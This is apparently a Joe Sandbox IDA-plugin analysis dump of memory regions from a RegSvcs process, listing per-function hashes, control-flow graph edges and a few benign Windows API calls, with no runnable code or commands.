                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_17_2_2420000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 4'gq$4'gq
                                                                                                                                                          • API String ID: 0-2478590125
                                                                                                                                                          • Opcode ID: 7129157a9f4be54ab984b327b6c573acc4f0ddd0311060a4e09d86977207ca24
                                                                                                                                                          • Instruction ID: 20dfacd0b111460570d823ecb9e1f318541029180bd3983427ec121ebd62fbb3
                                                                                                                                                          • Opcode Fuzzy Hash: 7129157a9f4be54ab984b327b6c573acc4f0ddd0311060a4e09d86977207ca24
                                                                                                                                                          • Instruction Fuzzy Hash: A4B1A1706006258FCB15CF6AC480ABEB7F6FF84304F95846AE506CB355DB35E94ACBA0

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 1800 2425460-242546d 1801 2425475-2425477 1800->1801 1802 242546f-2425473 1800->1802 1804 2425688-242568f 1801->1804 1802->1801 1803 242547c-2425487 1802->1803 1805 2425690 1803->1805 1806 242548d-2425494 1803->1806 1811 2425695-24256cd 1805->1811 1807 242549a-24254a9 1806->1807 1808 2425629-242562f 1806->1808 1807->1811 1812 24254af-24254be 1807->1812 1809 2425631-2425633 1808->1809 1810 2425635-2425639 1808->1810 1809->1804 1813 2425686 1810->1813 1814 242563b-2425641 1810->1814 1825 24256d6-24256da 1811->1825 1826 24256cf-24256d4 1811->1826 1818 24254d3-24254d6 1812->1818 1819 24254c0-24254c3 1812->1819 1813->1804 1814->1805 1816 2425643-2425646 1814->1816 1816->1805 1820 2425648-242565d 1816->1820 1822 24254e2-24254e8 1818->1822 1824 24254d8-24254db 1818->1824 1819->1822 1823 24254c5-24254c8 1819->1823 1838 2425681-2425684 1820->1838 1839 242565f-2425665 1820->1839 1832 2425500-242551d 1822->1832 1833 24254ea-24254f0 1822->1833 1827 24255c9-24255cf 1823->1827 1828 24254ce 1823->1828 1829 242552e-2425534 1824->1829 1830 24254dd 1824->1830 1834 24256e0-24256e2 1825->1834 1826->1834 1844 24255d1-24255d7 1827->1844 1845 24255e7-24255f1 1827->1845 1835 24255f4-2425601 1828->1835 1836 2425536-242553c 1829->1836 1837 242554c-242555e 1829->1837 1830->1835 1871 2425526-2425529 1832->1871 1840 24254f2 1833->1840 1841 24254f4-24254fe 1833->1841 1842 24256f7-24256fe 1834->1842 1843 24256e4-24256f6 1834->1843 1862 2425603-2425607 1835->1862 1863 2425615-2425617 1835->1863 1849 2425540-242554a 1836->1849 1850 242553e 1836->1850 1865 2425560-242556c 1837->1865 1866 242556e-2425591 1837->1866 1838->1804 1851 2425677-242567a 1839->1851 1852 2425667-2425675 1839->1852 1840->1832 1841->1832 1846 24255db-24255e5 1844->1846 1847 24255d9 1844->1847 1845->1835 1846->1845 1847->1845 1849->1837 1850->1837 1851->1805 1855 242567c-242567f 1851->1855 1852->1805 1852->1851 1855->1838 1855->1839 1862->1863 1867 2425609-242560d 1862->1867 1868 242561b-242561e 1863->1868 1874 24255b9-24255c7 1865->1874 1866->1805 1876 2425597-242559a 1866->1876 1867->1805 1872 2425613 1867->1872 1868->1805 1873 2425620-2425623 1868->1873 1871->1835 1872->1868 1873->1807 1873->1808 1874->1835 1876->1805 1878 24255a0-24255b2 1876->1878 1878->1874
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000011.00000002.2867085764.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_17_2_2420000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: ,kq$,kq
                                                                                                                                                          • API String ID: 0-3716310059
                                                                                                                                                          • Opcode ID: 1885c0fabf1d2f543adba6587360e6afddb060101a8af2fe17cf9df1de0c6fda
                                                                                                                                                          • Instruction ID: b3177012cbe6a8d6d7e4e7d07aff8dcb4747ebdab6f26938076f6e13dedd4309
                                                                                                                                                          • Opcode Fuzzy Hash: 1885c0fabf1d2f543adba6587360e6afddb060101a8af2fe17cf9df1de0c6fda
                                                                                                                                                          • Instruction Fuzzy Hash: 12817234A00525CFCB18DF6AC444A6AB7B6FF89718BE5816AD409DB364D731EC85CF50

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 1880 2424ef0-2424f22 1881 2424f24-2424f28 1880->1881 1882 2424f38-2424f43 1880->1882 1883 2424f50-2424f57 1881->1883 1884 2424f2a-2424f36 1881->1884 1885 2424feb-2425017 1882->1885 1886 2424f49-2424f4b 1882->1886 1888 2424f77-2424f80 1883->1888 1889 2424f59-2424f60 1883->1889 1884->1882 1884->1883 1894 242501e-2425076 1885->1894 1887 2424fe3-2424fe8 1886->1887 1981 2424f82 call 2424ef0 1888->1981 1982 2424f82 call 2425068 1888->1982 1889->1888 1891 2424f62-2424f6d 1889->1891 1893 2424f73-2424f75 1891->1893 1891->1894 1892 2424f88-2424f8a 1895 2424f92-2424f9a 1892->1895 1896 2424f8c-2424f90 1892->1896 1893->1887 1912 2425085-2425097 1894->1912 1913 2425078-242507e 1894->1913 1899 2424fa9-2424fab 1895->1899 1900 2424f9c-2424fa1 1895->1900 1896->1895 1898 2424fad-2424fbe 1896->1898 1983 2424fc1 call 2425968 1898->1983 1984 2424fc1 call 2425978 1898->1984 1899->1887 1900->1899 1903 2424fc7-2424fcc 1906 2424fe1 1903->1906 1907 2424fce-2424fd7 1903->1907 1906->1887 1985 2424fd9 call 2429ec0 1907->1985 1986 2424fd9 call 2429eb0 1907->1986 1987 2424fd9 call 2429f6d 1907->1987 1909 2424fdf 1909->1887 1915 242512b-242512d 1912->1915 1916 242509d-24250a1 1912->1916 1913->1912 1988 242512f call 24252c8 1915->1988 1989 242512f call 24252b8 1915->1989 1917 24250a3-24250af 1916->1917 1918 24250b1-24250be 1916->1918 1924 24250c0-24250ca 1917->1924 1918->1924 1919 2425135-242513b 1922 2425147-242514e 1919->1922 1923 242513d-2425143 1919->1923 1925 2425145 1923->1925 1926 24251a9-2425208 1923->1926 1929 24250f7-24250fb 1924->1929 1930 24250cc-24250db 1924->1930 1925->1922 1941 242520f-2425233 1926->1941 1932 2425107-242510b 1929->1932 1933 24250fd-2425103 1929->1933 1938 24250eb-24250f5 1930->1938 1939 24250dd-24250e4 1930->1939 1932->1922 1935 242510d-2425111 1932->1935 1936 2425151-24251a2 1933->1936 1937 2425105 1933->1937 1940 2425117-2425129 1935->1940 1935->1941 1936->1926 1937->1922 1938->1929 1939->1938 1940->1922 1949 2425235-2425237 1941->1949 1950 2425239-242523b 1941->1950 1951 24252b1-24252b4 1949->1951 1952 242524c-242524e 1950->1952 1953 242523d-2425241 1950->1953 1959 2425250-2425254 1952->1959 1960 2425261-2425267 1952->1960 1957 2425243-2425245 1953->1957 1958 2425247-242524a 1953->1958 1957->1951 1958->1951 1961 2425256-2425258 1959->1961 1962 242525a-242525f 1959->1962 1964 2425292-2425294 1960->1964 1965 2425269-2425290 1960->1965 1961->1951 1962->1951 1968 242529b-242529d 1964->1968 1965->1968 1971 24252a3-24252a5 1968->1971 1972 242529f-24252a1 1968->1972 1975 24252a7-24252ac 1971->1975 1976 24252ae 1971->1976 1972->1951 1975->1951 1976->1951 1981->1892 1982->1892 1983->1903 1984->1903 1985->1909 1986->1909 1987->1909 1988->1919 1989->1919
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000011.00000002.2867085764.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_17_2_2420000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: Hkq$Hkq
                                                                                                                                                          • API String ID: 0-2158860719
                                                                                                                                                          • Opcode ID: 263e0b4e9d459bc9d73c1e478b668101704dc7a22a1ba2d678e3b128a11313c4
                                                                                                                                                          • Instruction ID: 08d823a68870bc789306427c8a91c48515e3a15e9be14d9cf2cebc89ed1605b2
                                                                                                                                                          • Opcode Fuzzy Hash: 263e0b4e9d459bc9d73c1e478b668101704dc7a22a1ba2d678e3b128a11313c4
                                                                                                                                                          • Instruction Fuzzy Hash: 3B51BD357042648FDB1A8F25D854BAB7BF2FF88304F56892AE806CB394CB758805CB90

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 1990 2428bf0-2428c11 2028 2428c13 call 2428bf0 1990->2028 2029 2428c13 call 24289d0 1990->2029 1991 2428c19-2428c20 1992 2428c22-2428c27 1991->1992 1993 2428c2c-2428c4c 1991->1993 1994 2428cf5-2428cfc 1992->1994 1996 2428c87-2428c89 1993->1996 1997 2428c4e-2428c50 1993->1997 2000 2428cf0 1996->2000 2001 2428c8b-2428c91 1996->2001 1998 2428c52-2428c57 1997->1998 1999 2428c5f-2428c66 1997->1999 1998->1999 2002 2428cff-2428d2b call 24285e8 1999->2002 2003 2428c6c-2428c85 1999->2003 2000->1994 2001->2000 2004 2428c93-2428cae 2001->2004 2016 2428d39-2428d42 call 24285e8 2002->2016 2017 2428d2d-2428d37 2002->2017 2003->1994 2009 2428cb0-2428cb2 2004->2009 2010 2428ce5-2428ce7 2004->2010 2013 2428cc1-2428cc8 2009->2013 2014 2428cb4-2428cb9 2009->2014 2010->2000 2011 2428ce9-2428cee 2010->2011 2011->1994 2013->2002 2015 2428cca-2428ce3 2013->2015 2014->2013 2015->1994 2022 2428d50-2428d5e call 2428d90 2016->2022 2023 2428d44-2428d4e 2016->2023 2017->2016 2025 2428d64-2428d8d 2022->2025 2023->2022 2028->1991 2029->1991
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000011.00000002.2867085764.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_17_2_2420000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 4'gq$4'gq
                                                                                                                                                          • API String ID: 0-2478590125
                                                                                                                                                          • Opcode ID: 9caedd5a62e3813423aaf091ba66dc8934e205c185789c8385223e467360475a
                                                                                                                                                          • Instruction ID: 021b545e981bf40207445fa2ab10c1131264eed99086788653870f08d9cfd562
                                                                                                                                                          • Opcode Fuzzy Hash: 9caedd5a62e3813423aaf091ba66dc8934e205c185789c8385223e467360475a
                                                                                                                                                          • Instruction Fuzzy Hash: DE518D707022249FDB149F6AC844B6FBBA6EB88350F548466E909CB352DB71DC05CBA1

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 2031 2422c88-2422ca1 2033 2422cb2-2422cba 2031->2033 2034 2422ca3-2422ca5 2031->2034 2038 2422cbc-2422cca 2033->2038 2035 2422ca7-2422ca9 2034->2035 2036 2422cab-2422cb0 2034->2036 2035->2038 2036->2038 2040 2422ce0-2422ce8 2038->2040 2041 2422ccc-2422cce 2038->2041 2044 2422ceb-2422cee 2040->2044 2042 2422cd0-2422cd5 2041->2042 2043 2422cd7-2422cde 2041->2043 2042->2044 2043->2044 2046 2422cf0-2422cfe 2044->2046 2047 2422d05-2422d09 2044->2047 2046->2047 2055 2422d00 2046->2055 2048 2422d22-2422d25 2047->2048 2049 2422d0b-2422d19 2047->2049 2050 2422d27-2422d2b 2048->2050 2051 2422d2d-2422d62 2048->2051 2049->2048 2056 2422d1b 2049->2056 2050->2051 2054 2422d64-2422d7b 2050->2054 2062 2422dc4-2422dc9 2051->2062 2058 2422d81-2422d8d 2054->2058 2059 2422d7d-2422d7f 2054->2059 2055->2047 2056->2048 2060 2422d97-2422da1 2058->2060 2061 2422d8f-2422d95 2058->2061 2059->2062 2063 2422da9 2060->2063 2064 2422da3 2060->2064 2061->2063 2066 2422db1-2422dbd 2063->2066 2064->2063 2066->2062
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000011.00000002.2867085764.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_17_2_2420000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: Xkq$Xkq
                                                                                                                                                          • API String ID: 0-930889198
                                                                                                                                                          • Opcode ID: 6c1472978a869c04361a3c1534dea7414cec237be32097c63860cbf41886165f
                                                                                                                                                          • Instruction ID: f9c602222aa923f69daf7d9456a40c0fd85749042f338a1d2dc720066ddf087d
                                                                                                                                                          • Opcode Fuzzy Hash: 6c1472978a869c04361a3c1534dea7414cec237be32097c63860cbf41886165f
                                                                                                                                                          • Instruction Fuzzy Hash: DC31C075B102358BDB2C9A6B989437B66AAFBC4204F54443BDD02C7384EFF4888A8691

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 2070 63854e8-63854f7 2071 63854f9-6385506 call 6384454 2070->2071 2072 6385523-6385527 2070->2072 2077 6385508 2071->2077 2078 638551c 2071->2078 2074 6385529-6385533 2072->2074 2075 638553b-638557c 2072->2075 2074->2075 2081 6385589-6385597 2075->2081 2082 638557e-6385586 2075->2082 2130 638550e call 6385770 2077->2130 2131 638550e call 6385780 2077->2131 2078->2072 2083 6385599-638559e 2081->2083 2084 63855bb-63855bd 2081->2084 2082->2081 2086 63855a9 2083->2086 2087 63855a0-63855a7 call 6384460 2083->2087 2089 63855c0-63855c7 2084->2089 2085 6385514-6385516 2085->2078 2088 6385658-63856a5 2085->2088 2091 63855ab-63855b9 2086->2091 2087->2091 2116 63856a6-63856d1 2088->2116 2092 63855c9-63855d1 2089->2092 2093 63855d4-63855db 2089->2093 2091->2089 2092->2093 2095 63855e8-63855f1 2093->2095 2096 63855dd-63855e5 2093->2096 2100 63855fe-6385603 2095->2100 2101 63855f3-63855fb 2095->2101 2096->2095 2102 6385621-6385625 2100->2102 2103 6385605-638560c 2100->2103 2101->2100 2128 6385628 call 6385a30 2102->2128 2129 6385628 call 6385a40 2102->2129 2103->2102 2105 638560e-638561e call 638243c call 6384470 2103->2105 2105->2102 2108 638562b-638562e 2110 6385630-638564e 2108->2110 2111 6385651-6385657 2108->2111 2110->2111 2120 63856d3-6385718 2116->2120 2122 638571a-638571d 2120->2122 2123 6385720-638574b GetModuleHandleW 2120->2123 2122->2123 2124 638574d-6385753 2123->2124 2125 6385754-6385768 2123->2125 2124->2125 2128->2108 2129->2108 2130->2085 2131->2085
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000011.00000002.2886135148.0000000006380000.00000040.00000800.00020000.00000000.sdmp, Offset: 06380000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_17_2_6380000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: HandleModule
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4139908857-0
                                                                                                                                                          • Opcode ID: 82f8f98406529cbb2e7e664af8e7abf844d489b9b3026536b7c2bd8db97e56c0
                                                                                                                                                          • Instruction ID: ba7e6ddd7f198ded9842523ad9550c9beefd0bedacd49697effd6f6fb6abd560
                                                                                                                                                          • Opcode Fuzzy Hash: 82f8f98406529cbb2e7e664af8e7abf844d489b9b3026536b7c2bd8db97e56c0
                                                                                                                                                          • Instruction Fuzzy Hash: C2813670A00B058FD7A4EF29D44479ABBF2FF88310F10892DD496DBA50D774E949CB91

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 2132 6387ac4-6387b36 2134 6387b38-6387b3e 2132->2134 2135 6387b41-6387b48 2132->2135 2134->2135 2136 6387b4a-6387b50 2135->2136 2137 6387b53-6387b8b 2135->2137 2136->2137 2138 6387b93-6387bf2 CreateWindowExW 2137->2138 2139 6387bfb-6387c33 2138->2139 2140 6387bf4-6387bfa 2138->2140 2144 6387c40 2139->2144 2145 6387c35-6387c38 2139->2145 2140->2139 2146 6387c41 2144->2146 2145->2144 2146->2146
                                                                                                                                                          APIs
                                                                                                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06387BE2
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000011.00000002.2886135148.0000000006380000.00000040.00000800.00020000.00000000.sdmp, Offset: 06380000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_17_2_6380000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateWindow
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 716092398-0
                                                                                                                                                          • Opcode ID: 03284b8fa8bf08338ee1dff1d4a08e99691d12a9804e8a0f73373ac6c94902fc
                                                                                                                                                          • Instruction ID: c14f7fe2cf43fa8409c19d9603d8ed40ef3a80cfa1fcba2c36e979d3961c5508
                                                                                                                                                          • Opcode Fuzzy Hash: 03284b8fa8bf08338ee1dff1d4a08e99691d12a9804e8a0f73373ac6c94902fc
                                                                                                                                                          • Instruction Fuzzy Hash: A551B0B1D103499FDB14CFAAD884ADEBFB6FF48310F24852AE819AB210D7759945CF90

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 2147 6386efc-6387b36 2149 6387b38-6387b3e 2147->2149 2150 6387b41-6387b48 2147->2150 2149->2150 2151 6387b4a-6387b50 2150->2151 2152 6387b53-6387bf2 CreateWindowExW 2150->2152 2151->2152 2154 6387bfb-6387c33 2152->2154 2155 6387bf4-6387bfa 2152->2155 2159 6387c40 2154->2159 2160 6387c35-6387c38 2154->2160 2155->2154 2161 6387c41 2159->2161 2160->2159 2161->2161
                                                                                                                                                          APIs
                                                                                                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06387BE2
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000011.00000002.2886135148.0000000006380000.00000040.00000800.00020000.00000000.sdmp, Offset: 06380000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_17_2_6380000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateWindow
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 716092398-0
                                                                                                                                                          • Opcode ID: 10b1bdc30c455c9e99c50e5e438ae98d63a5a5b91ddd2ff7bebf778caf604e57
                                                                                                                                                          • Instruction ID: 6af2382c1db65320be8f2789769147624b6dcb37af6cb4a72a5a5814a749c557
                                                                                                                                                          • Opcode Fuzzy Hash: 10b1bdc30c455c9e99c50e5e438ae98d63a5a5b91ddd2ff7bebf778caf604e57
                                                                                                                                                          • Instruction Fuzzy Hash: 6851C0B1D103499FDB14DF9AC884ADEBBF6FF48310F24852AE819AB210D7759945CF90

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 2162 638704c-638a0cc 2165 638a17c-638a19c call 6386f24 2162->2165 2166 638a0d2-638a0d7 2162->2166 2173 638a19f-638a1ac 2165->2173 2168 638a0d9-638a110 2166->2168 2169 638a12a-638a162 CallWindowProcW 2166->2169 2176 638a119-638a128 2168->2176 2177 638a112-638a118 2168->2177 2171 638a16b-638a17a 2169->2171 2172 638a164-638a16a 2169->2172 2171->2173 2172->2171 2176->2173 2177->2176
                                                                                                                                                          APIs
                                                                                                                                                          • CallWindowProcW.USER32(?,?,?,?,?), ref: 0638A151
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000011.00000002.2886135148.0000000006380000.00000040.00000800.00020000.00000000.sdmp, Offset: 06380000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_17_2_6380000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CallProcWindow
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2714655100-0
                                                                                                                                                          • Opcode ID: b6aa305f74a62dbcfeeb1e108ab1b033f24a2dafe0ec48397fb93ef8b29e909c
                                                                                                                                                          • Instruction ID: bfdd39ef74c562e6909549f097d4434fe617f64a07cdc78f202a437874ae6640
                                                                                                                                                          • Opcode Fuzzy Hash: b6aa305f74a62dbcfeeb1e108ab1b033f24a2dafe0ec48397fb93ef8b29e909c
                                                                                                                                                          • Instruction Fuzzy Hash: 424128B8900305CFDB54DF99C888AAABBF5FB88314F24C459D519AB321D774A841CBA0

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 2179 6384454-6385718 2181 638571a-638571d 2179->2181 2182 6385720-638574b GetModuleHandleW 2179->2182 2181->2182 2183 638574d-6385753 2182->2183 2184 6385754-6385768 2182->2184 2183->2184
                                                                                                                                                          APIs
                                                                                                                                                          • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,06385504), ref: 0638573E
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000011.00000002.2886135148.0000000006380000.00000040.00000800.00020000.00000000.sdmp, Offset: 06380000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_17_2_6380000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: HandleModule
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4139908857-0
                                                                                                                                                          • Opcode ID: 33a48ac3b2d3bc3dfef545fe0d88d3142f6a08bfd48f6752fd76e39bbb82c8e3
                                                                                                                                                          • Instruction ID: df26d486c47ab5422da5b93e33274556505bfafdf760bfe3bce8ec7148ef5e3e
                                                                                                                                                          • Opcode Fuzzy Hash: 33a48ac3b2d3bc3dfef545fe0d88d3142f6a08bfd48f6752fd76e39bbb82c8e3
                                                                                                                                                          • Instruction Fuzzy Hash: 5F111FB9C00748CFDB60DF9AD444ADEBBF4EB88220F10841AD419A7200C375A545CFA4
                                                                                                                                                          APIs
                                                                                                                                                          • OleInitialize.OLE32(00000000), ref: 0638C5ED
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000011.00000002.2886135148.0000000006380000.00000040.00000800.00020000.00000000.sdmp, Offset: 06380000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_17_2_6380000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Initialize
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2538663250-0
                                                                                                                                                          • Opcode ID: b4ab5787383a547e70cd113c1eea4bf2df65b7aee29082def34005aa0e309158
                                                                                                                                                          • Instruction ID: cb1d7f53f9b17b70cac2f3644d50a7bdae943e37dcfac102e5b9d21e2dc6a0d2
                                                                                                                                                          • Opcode Fuzzy Hash: b4ab5787383a547e70cd113c1eea4bf2df65b7aee29082def34005aa0e309158
                                                                                                                                                          • Instruction Fuzzy Hash: F51130B0800348CFDB20DF9AD444BDEBBF8EB48320F248459D519B7200C379A944CFA9
                                                                                                                                                          APIs
                                                                                                                                                          • OleInitialize.OLE32(00000000), ref: 0638C5ED
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000011.00000002.2886135148.0000000006380000.00000040.00000800.00020000.00000000.sdmp, Offset: 06380000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_17_2_6380000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Initialize
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2538663250-0
                                                                                                                                                          • Opcode ID: a3502ca3b5c059d22d6d176094991eb1e70a4a1b2ee2e0d628f0da2fd268a75a
                                                                                                                                                          • Instruction ID: 0742ded1998a5116fedcf0a34c82685b422cc2c0efc2685cb60ebce5dc8e58ef
                                                                                                                                                          • Opcode Fuzzy Hash: a3502ca3b5c059d22d6d176094991eb1e70a4a1b2ee2e0d628f0da2fd268a75a
                                                                                                                                                          • Instruction Fuzzy Hash: D01115B5C00348CFDB20DF9AD448BDEBBF8EB48320F248419D519A7200D775A544CFA5
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000011.00000002.2867085764.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_17_2_2420000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: (ogq
                                                                                                                                                          • API String ID: 0-183986202
                                                                                                                                                          • Opcode ID: d8f3569020253cf38ef847d166c1d1129e8cfe5baa46c21ddcde67ad0bce84e9
                                                                                                                                                          • Instruction ID: 4cef8b77798b6eb19962114a36210630915afb5449bf67de5785d76d60fcb695
                                                                                                                                                          • Opcode Fuzzy Hash: d8f3569020253cf38ef847d166c1d1129e8cfe5baa46c21ddcde67ad0bce84e9
                                                                                                                                                          • Instruction Fuzzy Hash: 69419E31B002648FCB189F6AD854AAE7BB7ABCC710F65446AE906D7391CE359C06CB90
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000011.00000002.2867085764.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_17_2_2420000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: s
                                                                                                                                                          • API String ID: 0-453955339
                                                                                                                                                          • Opcode ID: 211c72f325790fcbed30e40c9e68e3d06e5cfc7754cd4ffde935ed6504e0673d
                                                                                                                                                          • Instruction ID: be40a2aa0d745f53e772859d417d0cf28b2ea2fedf4dd7ed747350b3b96b3dd4
                                                                                                                                                          • Opcode Fuzzy Hash: 211c72f325790fcbed30e40c9e68e3d06e5cfc7754cd4ffde935ed6504e0673d
                                                                                                                                                          • Instruction Fuzzy Hash: C9211470D0520A8FCB05DFB9D8945EEBFB0BF0A300F0005AAD409F7211EB304A99CBA1
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000011.00000002.2867085764.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_17_2_2420000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: e40a3c6680f454af3ac7e945e9f43a4f1949ceb9af7309348c3fea6a4b930001
                                                                                                                                                          • Instruction ID: f9124724bfef13407498a970d670f3d2cd6006a48691a56ba4198871008ad540
                                                                                                                                                          • Opcode Fuzzy Hash: e40a3c6680f454af3ac7e945e9f43a4f1949ceb9af7309348c3fea6a4b930001
                                                                                                                                                          • Instruction Fuzzy Hash: A8814770A01625DFC710CF2EC88095EBBB6FF89324B51C56AE8588B355DB31E856CBB0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000011.00000002.2867085764.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_17_2_2420000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 9b3ebac3befa904a3198129911d36cbc1663a6aca04022a64f5bf5b92d30c1c2
                                                                                                                                                          • Instruction ID: 7fbfb0fca4d8712a986b9e20b9696e860b4c04e850b3760796ce32de75d633a2
                                                                                                                                                          • Opcode Fuzzy Hash: 9b3ebac3befa904a3198129911d36cbc1663a6aca04022a64f5bf5b92d30c1c2
                                                                                                                                                          • Instruction Fuzzy Hash: 9661AF70B052308FDB299B3A8854B3B7BA6AFC4354F94852AD406CB395DF74DC86CB91
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000011.00000002.2867085764.0000000002420000.00000040.00000800.00020000.00000000.sdmp, Offset: 02420000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_17_2_2420000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 4524a95b2df579d92dda25df4e34395e6be77cd3d6fc704e2ab2fbdda9c753a5
                                                                                                                                                          • Instruction ID: 6c4a7341580e011b4d29e3b29ddf972021d6c4e4b7d822d8e82ab37321f9b00d
